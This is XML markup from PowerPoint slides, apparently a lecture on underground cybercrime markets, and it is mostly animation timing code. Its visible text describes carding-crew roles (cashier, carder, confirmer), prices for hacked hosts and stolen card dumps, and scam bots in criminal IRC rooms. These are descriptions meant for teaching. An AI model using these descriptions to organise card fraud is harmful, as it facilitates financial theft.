                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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par>
                                <p:cTn id="96" presetID="22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="99" presetID="22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="102" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="103" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="after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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="111" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>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27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="117" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="121" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="122" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="123" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="127" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>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30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="130" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>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xit" presetSubtype="4" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="134" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="135" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="136" presetID="22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="137" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="138" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="139" presetID="22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="140" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="141" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="142" presetID="22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="143" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="144" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="145" presetID="22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="146" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="147" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="148" presetID="22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="149" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="150" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="151" presetID="22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="152" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="153" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="154" presetID="22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="155" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="156" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="157" presetID="22" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="158" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="159" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="160" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="161" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="162" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="163" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>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32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="166" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>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33"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="169" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>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34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="172" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="173" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="174" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="175" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="17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0" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="1" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="33" grpId="0" animBg="1"/>
      <p:bldP spid="34" grpId="0" animBg="1"/>
      <p:bldP spid="3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3476" y="1321813"/>
            <a:ext cx="8900324" cy="5345112"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="211505" y="5005752"/>
            <a:ext cx="2951420" cy="1425028"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 73330"/>
              <a:gd name="adj2" fmla="val 82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Cashier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Cashes out bank accounts and keeps some of the money as a reward </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8773387" y="758132"/>
            <a:ext cx="3113814" cy="1603767"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -16693"/>
              <a:gd name="adj2" fmla="val 1643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Carder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Uses dumps to print fake credit cards and buy high-value items from stores for resale later</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364100" y="758132"/>
            <a:ext cx="2601649" cy="1603767"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42045"/>
              <a:gd name="adj2" fmla="val 1353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Confirmer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Performs in-person confirmation of money transfer (e.g. Western Union)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51153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9413"/>
            <a:ext cx="10515600" cy="1032597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prices for Hacked Hosts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2366" y="1321813"/>
            <a:ext cx="8947268" cy="4354177"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6145967"/>
            <a:ext cx="10515600" cy="60668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Prices for hacked hosts over time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25815947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8738" y="4511"/>
            <a:ext cx="8568909" cy="6141456"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6145967"/>
            <a:ext cx="10515600" cy="60668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Prices for packs of dumps (bundles of credit cards) circa 2014</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B514C092-1E52-4A02-987E-ED0A685B845A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="22489" t="59458" r="25407"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="602301" y="1029901"/>
            <a:ext cx="1920592" cy="2583895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40979928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4"/>
            <a:ext cx="10515600" cy="1086838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Treachery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563" y="1321813"/>
            <a:ext cx="8800476" cy="4343996"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6145967"/>
            <a:ext cx="10515600" cy="60668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IRC room includes many bots that offer basic services to users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468948" y="1846941"/>
            <a:ext cx="8015485" cy="13009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8254037" y="3673062"/>
            <a:ext cx="3588193" cy="1820504"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -52361"/>
              <a:gd name="adj2" fmla="val -968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These commands are scams! They return false information, and they record the CC/bank info for the administrators ;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422611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
            <a:ext cx="10515600" cy="1114633"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“An Analysis of Underground Forums”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2965" y="1395881"/>
            <a:ext cx="7809597" cy="4066237"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4172073" y="1803115"/>
            <a:ext cx="574196" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Buy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142190" y="1803115"/>
            <a:ext cx="574196" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Buy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5169154" y="1803115"/>
            <a:ext cx="550151" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Sell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7067227" y="1803115"/>
            <a:ext cx="550151" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Sell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1803241" y="5669297"/>
            <a:ext cx="8066824" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
